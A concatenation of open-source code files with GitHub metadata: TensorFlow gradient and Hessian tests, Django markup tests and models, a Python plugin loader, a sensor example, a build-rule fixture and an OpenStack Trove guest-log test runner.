b2 = constant_op.constant([1.0], name="b2")
y = f(f(x, b1), b2)
# Build gradient graph (should add SymbolicGradient node for function).
grads = gradients.gradients(y, [x, b1])
with self.test_session() as sess:
self.assertAllEqual([40.0], sess.run(grads)[0])
self.assertAllEqual([10.0], sess.run(grads)[1])
def testFunctionGradientsWithGradFunc(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
f = self._GetFunc(grad_func=grad_func)
# Get gradients (should add SymbolicGradient node for function, which
# uses the grad_func above, which multiplies all gradients by 2).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 2], grads[0])
self.assertAllEqual([1.0 * 2], grads[1])
def testFunctionGradientWithRegistration(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc(python_grad_func=self._PythonGradient)
# Get gradients, using the python gradient function. It multiplies the
# gradients by 3.
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 3], grads[0])
self.assertAllEqual([1.0 * 3], grads[1])
def testFunctionGradientWithGradFuncAndRegistration(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
with self.assertRaisesRegexp(ValueError, "Gradient defined twice"):
f = self._GetFunc(
grad_func=grad_func, python_grad_func=self._PythonGradient)
f.add_to_graph(ops.Graph())
class StopGradientTest(test_util.TensorFlowTestCase):
def testStopGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.stop_gradient(inp)
igrad = gradients.gradients(out, inp)[0]
assert igrad is None
class PreventGradientTest(test_util.TensorFlowTestCase):
def testPreventGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.prevent_gradient(inp)
with self.assertRaisesRegexp(LookupError, "explicitly disabled"):
_ = gradients.gradients(out, inp)
class HessianVectorProductTest(test_util.TensorFlowTestCase):
def testHessianVectorProduct(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that HessianVectorProduct matches multiplication by the
# explicit Hessian.
# Specifically, the Hessian of f(x) = x^T A x is
# H = A + A^T.
# We expect HessianVectorProduct(f(x), x, v) to be H v.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
v_value = rng.randn(m, 1).astype("float32")
x_value = rng.randn(m, 1).astype("float32")
hess_value = mat_value + mat_value.T
hess_v_value = np.dot(hess_value, v_value)
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
mat = constant_op.constant(mat_value)
v = constant_op.constant(v_value)
x = constant_op.constant(x_value)
mat_x = math_ops.matmul(mat, x, name="Ax")
x_mat_x = math_ops.matmul(array_ops.transpose(x), mat_x, name="xAx")
hess_v = gradients_impl._hessian_vector_product(x_mat_x, [x], [v])[0]
hess_v_actual = hess_v.eval()
self.assertAllClose(hess_v_value, hess_v_actual)
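# A standalone numpy cross-check of the math above; illustrative only and
# not part of the original test suite. Since the gradient of f(x) = x^T A x
# is (A + A^T) x, which is linear in x, a finite difference of the gradient
# along v recovers the Hessian-vector product (A + A^T) v almost exactly.
def _hessian_vector_product_numpy_check():
  rng = np.random.RandomState(0)
  mat = rng.randn(4, 4)
  x = rng.randn(4, 1)
  v = rng.randn(4, 1)
  grad = lambda z: np.dot(mat + mat.T, z)  # analytic gradient of z^T A z
  eps = 1e-6
  hvp_fd = (grad(x + eps * v) - grad(x)) / eps  # finite-difference HVP
  assert np.allclose(hvp_fd, np.dot(mat + mat.T, v), atol=1e-4)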
class HessianTest(test_util.TensorFlowTestCase):
def testHessian1D(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = x^T A x is H = A + A^T.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
x_value = rng.randn(m).astype("float32")
hess_value = mat_value + mat_value.T
with self.test_session(use_gpu=True):
mat = constant_op.constant(mat_value)
x = constant_op.constant(x_value)
x_mat_x = math_ops.reduce_sum(x[:, None] * mat * x[None, :])
hess = gradients.hessians(x_mat_x, x)[0]
hess_actual = hess.eval()
self.assertAllClose(hess_value, hess_actual)
def testHessian1D_multi(self):
# Test the computation of the hessian with respect to multiple tensors
m = 4
n = 3
rng = np.random.RandomState([1, 2, 3])
mat_values = [rng.randn(m, m).astype("float32") for _ in range(n)]
x_values = [rng.randn(m).astype("float32") for _ in range(n)]
hess_values = [mat_value + mat_value.T for mat_value in mat_values]
with self.test_session(use_gpu=True):
mats = [constant_op.constant(mat_value) for mat_value in mat_values]
xs = [constant_op.constant(x_value) for x_value in x_values]
xs_mats_xs = [
math_ops.reduce_sum(x[:, None] * mat * x[None, :])
for x, mat in zip(xs, mats)
]
hessians = gradients.hessians(xs_mats_xs, xs)
hessians_actual = [hess.eval() for hess in hessians]
for hess_value, hess_actual in zip(hess_values, hessians_actual):
self.assertAllClose(hess_value, hess_actual)
def testHessianInvalidDimension(self):
for shape in [(10, 10), None]:
with self.test_session(use_gpu=True):
x = array_ops.placeholder(dtypes.float32, shape)
# Expect a ValueError because the dimensions are wrong
with self.assertRaises(ValueError):
gradients.hessians(x, x)
class IndexedSlicesToTensorTest(test_util.TensorFlowTestCase):
def testIndexedSlicesToTensor(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testIndexedSlicesToTensorList(self):
with self.test_session():
numpy_list = []
dense_list = []
sparse_list = []
for _ in range(3):
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
numpy_list.append(np_val)
dense_list.append(c)
sparse_list.append(c_sparse)
packed_dense = array_ops.stack(dense_list)
packed_sparse = array_ops.stack(sparse_list)
self.assertAllClose(packed_dense.eval(), packed_sparse.eval())
def testInt64Indices(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
c_sparse = ops.IndexedSlices(
c_sparse.values,
math_ops.cast(c_sparse.indices, dtypes.int64), c_sparse.dense_shape)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testWarnings(self):
# TODO(gunan) Reenable after this issue is fixed:
# https://github.com/google/protobuf/issues/2812
if sys.version_info < (3, 6):
# Smaller than the threshold: no warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([4, 4, 4, 4]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(0, len(w))
# Greater than or equal to the threshold: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([100, 100, 100, 100]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"with 100000000 elements. This may consume a large amount of memory." in
str(w[0].message))
# Unknown dense shape: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32),
array_ops.placeholder(dtypes.int32))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"of unknown shape. This may consume a large amount of memory." in
str(w[0].message))
class OnlyRealGradientsTest(test_util.TensorFlowTestCase):
def testRealOnly(self):
x = constant_op.constant(7+3j, dtype=dtypes.complex64)
y = math_ops.square(x)
with self.assertRaisesRegexp(
TypeError,
r"Gradients of complex tensors must set grad_ys "
r"\(y\.dtype = tf\.complex64\)"):
gradients.gradients(y, x)
if __name__ == "__main__":
googletest.main()
|
{
"content_hash": "fe344b78a5bf7dc2b06731f0bf692565",
"timestamp": "",
"source": "github",
"line_count": 612,
"max_line_length": 84,
"avg_line_length": 37.995098039215684,
"alnum_prop": 0.6391003311400679,
"repo_name": "ibmsoe/tensorflow",
"id": "cd4c37d7e03a50d240d64690fa78a4f607d0f5ee",
"size": "23942",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/gradients_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7481"
},
{
"name": "C",
"bytes": "177439"
},
{
"name": "C++",
"bytes": "22867512"
},
{
"name": "CMake",
"bytes": "154015"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "794578"
},
{
"name": "HTML",
"bytes": "595822"
},
{
"name": "Java",
"bytes": "286562"
},
{
"name": "JavaScript",
"bytes": "13906"
},
{
"name": "Jupyter Notebook",
"bytes": "1833654"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37302"
},
{
"name": "Objective-C",
"bytes": "7037"
},
{
"name": "Objective-C++",
"bytes": "64166"
},
{
"name": "Protocol Buffer",
"bytes": "210699"
},
{
"name": "Python",
"bytes": "20094682"
},
{
"name": "Shell",
"bytes": "332127"
},
{
"name": "TypeScript",
"bytes": "790493"
}
],
"symlink_target": ""
}
|
import re
import unittest
from django.template import Template, Context, add_to_builtins
from django.utils.html import escape
add_to_builtins('django.contrib.markup.templatetags.markup')
class Templates(unittest.TestCase):
def test_textile(self):
try:
import textile
except ImportError:
textile = None
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context(locals())).strip()
if textile:
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
else:
self.assertEqual(rendered, escape(textile_content))
def test_markdown(self):
try:
import markdown
except ImportError:
markdown = None
markdown_content = """Paragraph 1
## An h2"""
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context(locals())).strip()
if markdown:
            pattern = re.compile(r"""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
            self.assertTrue(pattern.match(rendered))
else:
self.assertEqual(rendered, markdown_content)
def test_docutils(self):
try:
import docutils
except ImportError:
docutils = None
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context(locals())).strip()
if docutils:
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference" href="http://www.example.com/">link</a></p>""")
            except AssertionError:
# Docutils from SVN (which will become 0.5)
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference external" href="http://www.example.com/">link</a></p>""")
else:
self.assertEqual(rendered, rest_content)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "b91904d2617abee629f2beccfa43fde3",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 99,
"avg_line_length": 31.285714285714285,
"alnum_prop": 0.5674553756745537,
"repo_name": "greggian/TapdIn",
"id": "8bc17005f5d751555d0efc97505fab4b8dadf5e7",
"size": "2476",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/contrib/markup/tests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "82525"
},
{
"name": "Python",
"bytes": "3585862"
},
{
"name": "Shell",
"bytes": "227"
}
],
"symlink_target": ""
}
|
from django.db import models
class Blueprint(models.Model):
name = models.CharField(max_length=30)
class MineBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class FactoryBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class ResourceType(models.Model):
name = models.CharField(max_length=30, unique=True)
requirements = models.ForeignKey('Resources', blank=True, null=True)
def __str__(self):
return self.name
class Mine(models.Model):
name = models.CharField(max_length=30, unique=True)
all_resources = models.ForeignKey('Resources')
coordinates = models.ForeignKey('Coordinates')
blueprint = models.IntegerField()
production_level = models.FloatField()
def __str__(self):
return self.name
class Coordinates(models.Model):
x = models.FloatField()
y = models.FloatField()
class Resource(models.Model):
amount = models.FloatField()
resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
all_resources = models.ManyToManyField('Resource')
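
A quick sketch of how these models hang together at the ORM level, assuming
migrations have been applied (the import path follows this file's location
and the field values are hypothetical):

from engine_integration.models import Coordinates, Mine, Resources

coords = Coordinates.objects.create(x=10.0, y=20.0)
resources = Resources.objects.create()
mine = Mine.objects.create(
    name='Alpha', all_resources=resources, coordinates=coords,
    blueprint=1, production_level=0.5)
print(mine)  # __str__ returns the mine's name: 'Alpha'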
|
{
"content_hash": "2c4c046f44efe4a390bfb3b0f228da3d",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 72,
"avg_line_length": 28.88,
"alnum_prop": 0.6952908587257618,
"repo_name": "Fakor/congov",
"id": "c3172e99d994bc9a1f5a3627f498d712147cad3b",
"size": "1444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/engine_integration/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6367"
},
{
"name": "C++",
"bytes": "88959"
},
{
"name": "HTML",
"bytes": "2043"
},
{
"name": "Makefile",
"bytes": "2728"
},
{
"name": "Objective-C",
"bytes": "422"
},
{
"name": "Python",
"bytes": "57970"
},
{
"name": "Shell",
"bytes": "2519"
}
],
"symlink_target": ""
}
|
import imp
import os
plugin_folder = os.path.join(os.path.dirname(os.path.abspath(__file__)))
main_module = '__init__'
def get_plugins():
plugins = []
possible_plugins = os.listdir(plugin_folder)
for i in possible_plugins:
location = os.path.join(plugin_folder, i)
        if not os.path.isdir(location) or main_module + '.py' not in os.listdir(location):
continue
info = imp.find_module(main_module, [location])
plugins.append({'name': i, 'info': info})
return plugins
def load_plugin(plugin):
return imp.load_module(plugin['name'], *plugin['info'])
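
A minimal usage sketch of the two helpers above; any package directory
inside the plugin folder that contains an __init__.py qualifies as a
plugin (the import path follows this file's location):

from xmm.plugins import pluginloader

for plugin in pluginloader.get_plugins():
    module = pluginloader.load_plugin(plugin)
    print('loaded plugin:', plugin['name'], module)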
|
{
"content_hash": "555cf2f3264ed4da9b8cfb513af0b980",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 90,
"avg_line_length": 29.142857142857142,
"alnum_prop": 0.6388888888888888,
"repo_name": "z/xonotic-map-manager",
"id": "59bb4102f31e97c76e45981691404fa9022901be",
"size": "612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xmm/plugins/pluginloader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "840"
},
{
"name": "Python",
"bytes": "97980"
},
{
"name": "Shell",
"bytes": "2053"
}
],
"symlink_target": ""
}
|
from story.models import Story
def test_story_creation(data_dict):
story = Story.objects.create(**data_dict)
assert str(story) == data_dict['name']
|
{
"content_hash": "243ab51fa8036b06e29aa94cb009f970",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 45,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.6981132075471698,
"repo_name": "DjangoGirls/djangogirls",
"id": "f0e1a985153acf8cf3c4187123acad338fb7344a",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/story/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "428291"
},
{
"name": "JavaScript",
"bytes": "13711"
},
{
"name": "Python",
"bytes": "422267"
},
{
"name": "Stylus",
"bytes": "32803"
}
],
"symlink_target": ""
}
|
from time import sleep
from treehopper.api import *
from treehopper.libraries.sensors.optical import Tsl2591
board = find_boards()[0]
board.connect()
sensor = Tsl2591(board.i2c)
while board.connected:
print(sensor.lux)
sleep(0.1)
|
{
"content_hash": "beacf6fb6c2fef6211fb0fa244ec401e",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 56,
"avg_line_length": 21.818181818181817,
"alnum_prop": 0.7541666666666667,
"repo_name": "treehopper-electronics/treehopper-sdk",
"id": "110ab53e495913c88d78cab6d7239e47f29fb858",
"size": "240",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/library_examples/sensors/optical/tsl2591.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "6296"
},
{
"name": "Batchfile",
"bytes": "183"
},
{
"name": "C",
"bytes": "522458"
},
{
"name": "C#",
"bytes": "2112573"
},
{
"name": "C++",
"bytes": "517633"
},
{
"name": "CMake",
"bytes": "4426"
},
{
"name": "Java",
"bytes": "552020"
},
{
"name": "Jupyter Notebook",
"bytes": "169891"
},
{
"name": "Limbo",
"bytes": "19"
},
{
"name": "MATLAB",
"bytes": "1860"
},
{
"name": "Python",
"bytes": "599033"
}
],
"symlink_target": ""
}
|
from foreman import define_rule
COUNT = 0
if COUNT > 0:
raise AssertionError('load more than once')
COUNT += 1
# This creates a circular dependency!
define_rule('rule_y').depend('//pkg1/pkg2:rule_x')
|
{
"content_hash": "c635f140d2c127161dcaea7ee61fc773",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 50,
"avg_line_length": 18.90909090909091,
"alnum_prop": 0.7019230769230769,
"repo_name": "clchiou/garage",
"id": "fa9b44abb86e8d6a82948e8477c7144c6a527f9e",
"size": "208",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/foreman/tests/testdata/path2/pkg3/build.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cap'n Proto",
"bytes": "6917"
},
{
"name": "HTML",
"bytes": "113"
},
{
"name": "Java",
"bytes": "61027"
},
{
"name": "Python",
"bytes": "1653733"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
}
|
from swiftclient.client import ClientException
import tempfile
from troveclient.compat import exceptions
from trove.common import cfg
from trove.guestagent.common import operating_system
from trove.guestagent import guest_log
from trove.tests.config import CONFIG
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
CONF = cfg.CONF
class GuestLogRunner(TestRunner):
def __init__(self):
super(GuestLogRunner, self).__init__()
self.container = CONF.guest_log_container_name
self.prefix_pattern = '%(instance_id)s/%(datastore)s-%(log)s/'
self._last_log_published = {}
self._last_log_contents = {}
def _get_last_log_published(self, log_name):
return self._last_log_published.get(log_name, None)
def _set_last_log_published(self, log_name, published):
self._last_log_published[log_name] = published
def _get_last_log_contents(self, log_name):
return self._last_log_contents.get(log_name, [])
    def _set_last_log_contents(self, log_name, contents):
        self._last_log_contents[log_name] = contents
def _get_exposed_user_log_names(self):
"""Returns the full list of exposed user logs."""
return self.test_helper.get_exposed_user_log_names()
def _get_exposed_user_log_name(self):
"""Return the first exposed user log name."""
return self.test_helper.get_exposed_user_log_names()[0]
def _get_unexposed_sys_log_name(self):
"""Return the first unexposed sys log name."""
return self.test_helper.get_unexposed_sys_log_names()[0]
def run_test_log_list(self):
self.assert_log_list(self.auth_client,
self.test_helper.get_exposed_log_list())
def assert_log_list(self, client, expected_list):
log_list = list(client.instances.log_list(self.instance_info.id))
log_names = list(ll.name for ll in log_list)
self.assert_list_elements_equal(expected_list, log_names)
def run_test_admin_log_list(self):
self.assert_log_list(self.admin_client,
self.test_helper.get_full_log_list())
def run_test_log_show(self):
log_pending = self._set_zero_or_none()
self.assert_log_show(self.auth_client,
self._get_exposed_user_log_name(),
expected_published=0,
expected_pending=log_pending)
def _set_zero_or_none(self):
"""This attempts to handle the case where an existing instance
is used. Values that would normally be '0' are not, and must
be ignored.
"""
value = 0
if self.is_using_existing_instance:
value = None
return value
def assert_log_show(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_show for log '%s'" % log_name)
log_details = client.instances.log_show(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_details(self, log_details, expected_log_name,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
"""Check that the action generates the proper response data.
For log_published and log_pending, setting the value to 'None'
will skip that check (useful when using an existing instance,
as there may be pending things in user logs right from the get-go)
and setting it to a value other than '0' will verify that the actual
value is '>=value' (since it's impossible to know what the actual
value will be at any given time). '0' will still match exclusively.
"""
self.report.log("Validating log details for log '%s'" %
expected_log_name)
self._set_last_log_published(expected_log_name, log_details.published)
self.assert_equal(expected_log_name, log_details.name,
"Wrong log name for '%s' log" % expected_log_name)
self.assert_equal(expected_type, log_details.type,
"Wrong log type for '%s' log" % expected_log_name)
current_status = log_details.status.replace(' ', '_')
self.assert_equal(expected_status, current_status,
"Wrong log status for '%s' log" % expected_log_name)
if expected_published is None:
pass
elif expected_published == 0:
self.assert_equal(0, log_details.published,
"Wrong log published for '%s' log" %
expected_log_name)
else:
self.assert_true(log_details.published >= expected_published,
"Missing log published for '%s' log: "
"expected %d, got %d" %
(expected_log_name, expected_published,
log_details.published))
if expected_pending is None:
pass
elif expected_pending == 0:
self.assert_equal(0, log_details.pending,
"Wrong log pending for '%s' log" %
expected_log_name)
else:
self.assert_true(log_details.pending >= expected_pending,
"Missing log pending for '%s' log: "
"expected %d, got %d" %
(expected_log_name, expected_pending,
log_details.pending))
container = self.container
prefix = self.prefix_pattern % {
'instance_id': self.instance_info.id,
'datastore': CONFIG.dbaas_datastore,
'log': expected_log_name}
metafile = prefix.rstrip('/') + '_metafile'
if expected_published == 0:
self.assert_storage_gone(container, prefix, metafile)
container = 'None'
prefix = 'None'
else:
self.assert_storage_exists(container, prefix, metafile)
self.assert_equal(container, log_details.container,
"Wrong log container for '%s' log" %
expected_log_name)
self.assert_equal(prefix, log_details.prefix,
"Wrong log prefix for '%s' log" % expected_log_name)
self.assert_equal(metafile, log_details.metafile,
"Wrong log metafile for '%s' log" %
expected_log_name)
def assert_log_enable(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_enable for log '%s'" % log_name)
log_details = client.instances.log_enable(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_disable(self, client, log_name, discard=None,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_disable for log '%s' (discard: %s)" %
(log_name, discard))
log_details = client.instances.log_disable(
self.instance_info.id, log_name, discard=discard)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_publish(self, client, log_name, disable=None, discard=None,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_publish for log '%s' (disable: %s "
"discard: %s)" %
(log_name, disable, discard))
log_details = client.instances.log_publish(
self.instance_info.id, log_name, disable=disable, discard=discard)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_log_discard(self, client, log_name,
expected_http_code=200,
expected_type=guest_log.LogType.USER.name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=None, expected_pending=None):
self.report.log("Executing log_discard for log '%s'" % log_name)
log_details = client.instances.log_discard(
self.instance_info.id, log_name)
self.assert_client_code(expected_http_code)
self.assert_log_details(
log_details, log_name,
expected_type=expected_type,
expected_status=expected_status,
expected_published=expected_published,
expected_pending=expected_pending)
def assert_storage_gone(self, container, prefix, metafile):
try:
headers, container_files = self.swift_client.get_container(
container, prefix=prefix)
self.assert_equal(0, len(container_files),
"Found files in %s/%s: %s" %
(container, prefix, container_files))
except ClientException as ex:
if ex.http_status == 404:
self.report.log("Container '%s' does not exist" %
container)
else:
raise
try:
self.swift_client.get_object(container, metafile)
self.fail("Found metafile after discard: %s" % metafile)
except ClientException as ex:
if ex.http_status == 404:
self.report.log("Metafile '%s' gone as expected" %
metafile)
else:
raise
def assert_storage_exists(self, container, prefix, metafile):
try:
headers, container_files = self.swift_client.get_container(
container, prefix=prefix)
self.assert_true(len(container_files) > 0,
"No files found in %s/%s" %
(container, prefix))
except ClientException as ex:
if ex.http_status == 404:
self.fail("Container '%s' does not exist" % container)
else:
raise
try:
self.swift_client.get_object(container, metafile)
except ClientException as ex:
if ex.http_status == 404:
self.fail("Missing metafile: %s" % metafile)
else:
raise
def run_test_log_enable_sys(self,
expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_enable_fails(
self.admin_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_enable_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_enable,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_disable_sys(self,
expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_disable_fails(
self.admin_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_disable_fails(self, client,
expected_exception, expected_http_code,
log_name, discard=None):
self.assert_raises(expected_exception, None,
client.instances.log_disable,
self.instance_info.id, log_name,
discard=discard)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_show_unauth_user(self,
expected_exception=exceptions.NotFound,
expected_http_code=404):
self.assert_log_show_fails(
self.unauth_client,
expected_exception, expected_http_code,
self._get_exposed_user_log_name())
def assert_log_show_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_show,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_list_unauth_user(self,
expected_exception=exceptions.NotFound,
expected_http_code=404):
self.assert_raises(expected_exception, None,
self.unauth_client.instances.log_list,
self.instance_info.id)
# we're not using the main client, so check explicitly here
self.assert_client_code(expected_http_code, self.unauth_client)
def run_test_log_generator_unauth_user(self):
self.assert_log_generator_unauth_user(
self.unauth_client, self._get_exposed_user_log_name())
def assert_log_generator_unauth_user(self, client, log_name, publish=None):
        try:
            client.instances.log_generator(
                self.instance_info.id, log_name, publish=publish)
        except Exception:
            return
        self.fail("Client allowed unauthorized access to log_generator")
def run_test_log_generator_publish_unauth_user(self):
self.assert_log_generator_unauth_user(
self.unauth_client, self._get_exposed_user_log_name(),
publish=True)
def run_test_log_show_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_show_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_enable_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_enable_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_disable_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_disable_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def run_test_log_publish_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_publish_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_publish_fails(self, client,
expected_exception, expected_http_code,
log_name,
disable=None, discard=None):
self.assert_raises(expected_exception, None,
client.instances.log_publish,
self.instance_info.id, log_name,
disable=disable, discard=discard)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_discard_unexposed_user(
self, expected_exception=exceptions.BadRequest,
expected_http_code=400):
self.assert_log_discard_fails(
self.auth_client,
expected_exception, expected_http_code,
self._get_unexposed_sys_log_name())
def assert_log_discard_fails(self, client,
expected_exception, expected_http_code,
log_name):
self.assert_raises(expected_exception, None,
client.instances.log_discard,
self.instance_info.id, log_name)
# we may not be using the main client, so check explicitly here
self.assert_client_code(expected_http_code, client)
def run_test_log_enable_user(self):
expected_status = guest_log.LogStatus.Ready.name
expected_pending = 1
if self.test_helper.log_enable_requires_restart():
expected_status = guest_log.LogStatus.Restart_Required.name
# if using an existing instance, there may already be something
expected_pending = self._set_zero_or_none()
for log_name in self._get_exposed_user_log_names():
self.assert_log_enable(
self.auth_client,
log_name,
expected_status=expected_status,
expected_published=0, expected_pending=expected_pending)
def run_test_log_enable_flip_user(self):
# for restart required datastores, test that flipping them
# back to disabled returns the status to 'Disabled'
# from 'Restart_Required'
if self.test_helper.log_enable_requires_restart():
# if using an existing instance, there may already be something
expected_pending = self._set_zero_or_none()
for log_name in self._get_exposed_user_log_names():
self.assert_log_disable(
self.auth_client,
log_name,
expected_status=guest_log.LogStatus.Disabled.name,
expected_published=0, expected_pending=expected_pending)
